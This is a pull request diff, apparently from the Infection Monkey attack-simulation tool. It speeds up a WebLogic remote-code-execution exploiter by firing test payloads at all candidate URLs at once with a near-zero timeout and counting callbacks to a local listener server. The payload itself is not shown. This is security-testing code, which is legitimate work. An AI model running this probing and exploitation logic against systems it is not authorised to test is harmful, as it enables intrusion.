### PR TITLE
Improved the speed of weblogic exploiter

### DIFF
--- a/monkey/infection_monkey/exploit/web_rce.py
+++ b/monkey/infection_monkey/exploit/web_rce.py
@@ -54,7 +54,7 @@ class WebRCE(HostExploiter):
         exploit_config['upload_commands'] = None
 
         # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
-        exploit_config['url_extensions'] = None
+        exploit_config['url_extensions'] = []
 
         # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
         exploit_config['stop_checking_urls'] = False

--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@@ -69,7 +69,7 @@ class WebLogicExploiter(WebRCE):
             print(e)
         return True
 
-    def add_vulnerable_urls(self, urls):
+    def add_vulnerable_urls(self, urls, stop_checking=False):
         """
         Overrides parent method to use listener server
         """
@@ -78,7 +78,7 @@ class WebLogicExploiter(WebRCE):
         exploitable = False
 
         for url in urls:
-            if self.check_if_exploitable(url, httpd):
+            if self.check_if_exploitable_weblogic(url, httpd):
                 exploitable = True
                 break
 
@@ -95,8 +95,8 @@ class WebLogicExploiter(WebRCE):
 
         self._stop_http_server(httpd, lock)
 
-    def check_if_exploitable(self, url, httpd):
-        payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
+    def check_if_exploitable_weblogic(self, url, httpd):
+        payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
         try:
             post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
         except exceptions.ReadTimeout:
@@ -120,7 +120,8 @@ class WebLogicExploiter(WebRCE):
         lock.acquire()
         return httpd, lock
 
-    def _stop_http_server(self, httpd, lock):
+    @staticmethod
+    def _stop_http_server(httpd, lock):
         lock.release()
         httpd.join(SERVER_TIMEOUT)
         httpd.stop()
@@ -194,8 +195,8 @@ class WebLogicExploiter(WebRCE):
         we determine if we can exploit by either getting a GET request from host or not.
         """
         def __init__(self, local_ip, local_port, lock, max_requests=1):
-            self._local_ip = local_ip
-            self._local_port = local_port
+            self.local_ip = local_ip
+            self.local_port = local_port
             self.get_requests = 0
             self.max_requests = max_requests
             self._stopped = False
@@ -210,7 +211,7 @@ class WebLogicExploiter(WebRCE):
                     LOG.info('Server received a request from vulnerable machine')
                     self.get_requests += 1
             LOG.info('Server waiting for exploited machine request...')
-            httpd = HTTPServer((self._local_ip, self._local_port), S)
+            httpd = HTTPServer((self.local_ip, self.local_port), S)
             httpd.daemon = True
             self.lock.release()
             while not self._stopped and self.get_requests < self.max_requests:

--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
 
 import threading
 import logging
+import time
 
 __author__ = "VakarisZ"
 
 LOG = logging.getLogger(__name__)
 # How long server waits for get request in seconds
 SERVER_TIMEOUT = 4
-# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
+# How long should be wait after each request in seconds
+REQUEST_DELAY = 0.0001
+# How long to wait for a sign(request from host) that server is vulnerable. In seconds
 REQUEST_TIMEOUT = 2
 # How long to wait for response in exploitation. In seconds
 EXECUTION_TIMEOUT = 15
@@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
             print(e)
         return True
 
-    def check_if_exploitable(self, url):
+    def add_vulnerable_urls(self, urls):
+        """
+        Overrides parent method to use listener server
+        """
         # Server might get response faster than it starts listening to it, we need a lock
         httpd, lock = self._start_http_server()
+        exploitable = False
+
+        for url in urls:
+            if self.check_if_exploitable(url, httpd):
+                exploitable = True
+                break
+
+        if not exploitable and httpd.get_requests < 1:
+            # Wait for responses
+            time.sleep(REQUEST_TIMEOUT)
+
+        if httpd.get_requests > 0:
+            # Add all urls because we don't know which one is vulnerable
+            self.vulnerable_urls.extend(urls)
+            self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
+        else:
+            LOG.info("No vulnerable urls found, skipping.")
+
+        self._stop_http_server(httpd, lock)
+
+    def check_if_exploitable(self, url, httpd):
         payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
         try:
-            post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
+            post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
         except exceptions.ReadTimeout:
-            # Our request does not get response thus we get ReadTimeout error
+            # Our request will not get response thus we get ReadTimeout error
             pass
         except Exception as e:
             LOG.error("Something went wrong: %s" % e)
-        self._stop_http_server(httpd, lock)
         return httpd.get_requests > 0
 
     def _start_http_server(self):


### PR DESCRIPTION
# Improvements
Improved the speed of weblogic exploiter by firing all requests virtually at the same time. Downside is that we loose the knowledge which url's are vulnerable and which aren't. 
If any of them are vulnerable the machine is marked as exploited, but monkey only tries to exploit first url in the list.
From my experience all url's we try are standard server url's and if one is exploitable, all of them are.
